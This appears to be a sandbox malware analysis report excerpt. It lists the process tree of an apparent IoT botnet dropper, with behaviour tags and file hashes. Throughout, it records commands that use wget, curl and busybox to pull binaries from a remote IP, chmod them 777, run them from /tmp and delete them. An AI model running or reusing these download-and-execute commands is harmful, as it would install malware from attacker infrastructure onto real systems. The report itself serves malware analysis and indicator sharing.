/bin/busybox/bin/busybox wget http://87.120.125.191/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:1639
-
-
/bin/chmodchmod 777 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG./NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:1645
-
-
/bin/chmodchmod 777 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS./ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:1651
-
-
/bin/chmodchmod 777 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9./Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:1657
-
-
/bin/chmodchmod 777 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V./2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:1663
-
-
/bin/chmodchmod 777 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd./gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1669
-
-
/bin/chmodchmod 777 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo./QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1672
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97